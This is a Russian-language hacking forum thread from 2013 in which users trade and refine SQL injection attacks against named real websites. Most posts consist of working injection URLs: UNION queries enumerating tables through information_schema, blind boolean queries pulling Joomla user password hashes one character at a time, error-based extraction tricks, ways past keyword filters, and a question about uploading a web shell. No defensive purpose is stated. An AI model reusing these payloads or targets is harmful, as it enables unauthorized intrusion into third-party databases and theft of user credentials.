
27.08.2013, 18:01
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
Сообщение от BigBear
Принтабельные колонки подразумевают
ЧТЕНИЕ
, а
НЕ ВЫПОЛНЕНИЕ
запрашиваемых данных.
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду
|
|
|

27.08.2013, 18:37
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от exstreme
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду
У юзера бд слишком кастрированные права, файла быть не может, его и нет.
Из доступных там бд всего 2 - текущая и information_schema, так что выводить там больше нечего.
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1 union select 1,2,3,4,@a,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from(select @a:=0,(select 1 from information_schema.tables where TABLE_SCHEMA='rh_tppg' and (@a:=concat(@a,";",TABLE_NAME))))b -- w
Например вывод таблиц из текущий базы.
|
|
|

29.08.2013, 20:07
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0
http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции
P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...
|
|
|

29.08.2013, 20:56
|
|
Новичок
Регистрация: 27.08.2013
Сообщений: 3
С нами:
6689846
Репутация:
0
|
|
Ребят, помогите пожалуйста советом кто разбирается в скулях. БД MySQL 5.1.
Ситуация такая:
Уперся в глухой тупик при разборе Blind SQL injection, по типу true:false. Запрос исполнился - страница загрузилась как надо; запрос неверный - страница осталась пустой. Ручками в принципе нашел все таблицы что надо - оказались обычные джумловские, версии 1.5.15.
Сама скуля оказалась в компоненте virtuemart. Сам запрос на проверку уязвимости выглядит так:
На "and" выдает ошибку (пустая страница), т.е. проходит только через "or". UNION, INSERT, UPDATE, кавычки и апострофы - в запросах также не проходят. Замена "and" или кавычек - hex кодом результата также не дает. Насчет инфы по БД, определить удалось только версию Version(), остальные функции: USER(), USER_session(), DATABASE() - определяет как ошибочные.
Все запросы на выборку делаются примерно так:
Код:
...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))>=49 limit 0,1)=1 --
и так тоже работает
...&search_category=0 or (SELECT 1 FROM jos_users WHERE substr(password,1,1)>=0х6d limit 0,1)=1 --
Т.е. можно сравнивать удачно как аскии код, так и hex код подбираемого символа. (Кэп)
В случае сравнения ASCII кодов интересно то, что сравнивать можно только по ">=" или "=". Знак меньше
Также есть доступ к php.ini. Если надо будет, могу подсмотреть какие-то параметры.
Код:
magic_quotes_gpc Off Off
safe_mode Off Off
sql.safe_mode Off Off
track_errors Off Off
display_errors Off Off
display_startup_errors Off Off
allow_url_fopen On On
allow_url_include Off Off
ЗЫ Подобные коллизиции пока в 2ух случаях нашел.
|
|
|

29.08.2013, 23:38
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
|
|
|

29.08.2013, 23:57
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Unknowhacker
Код:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
Сообщение от None
http://www.belavtostrada.by/show.php?category=6'and version()+like+'%5%'+--+
фильтр на select
|
|
|

30.08.2013, 00:42
|
|
Новичок
Регистрация: 27.08.2013
Сообщений: 3
С нами:
6689846
Репутация:
0
|
|
Сообщение от Unknowhacker
Код:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
Всего один столбец. при вводе оператора UNION - Hacker attemp!
Не при UNION, а при SELECT
6'+and+user()+like+'belav%'--+
дальше сам бруть
|
|
|

30.08.2013, 10:14
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Unknowhacker
Код:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://krasnodar.rtrn.ru/news.asp?view=19418%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ взгляни плз
http://www.tppkuban.ru/search.php?sovpad=1®istr=1&gogo=%E8%F1%EA%E0%F2%FC%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0
http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции
P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...
Непонятных моментов будет меньше, если разберешься с различием в раскрутке инъекций в строковыхи числовых уязвимостых параметрах:
http://www.scrutineer.ru/results.php?id= 3+order+by+8+--+
|
|
|

01.09.2013, 16:24
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR
Код:
http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
|
|
|

01.09.2013, 16:33
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Unknowhacker
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR
Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем?
К примеру получаем вывод имени базы данных через error-based, но немного другого типа:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20--%20
[/COLOR][/COLOR]
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|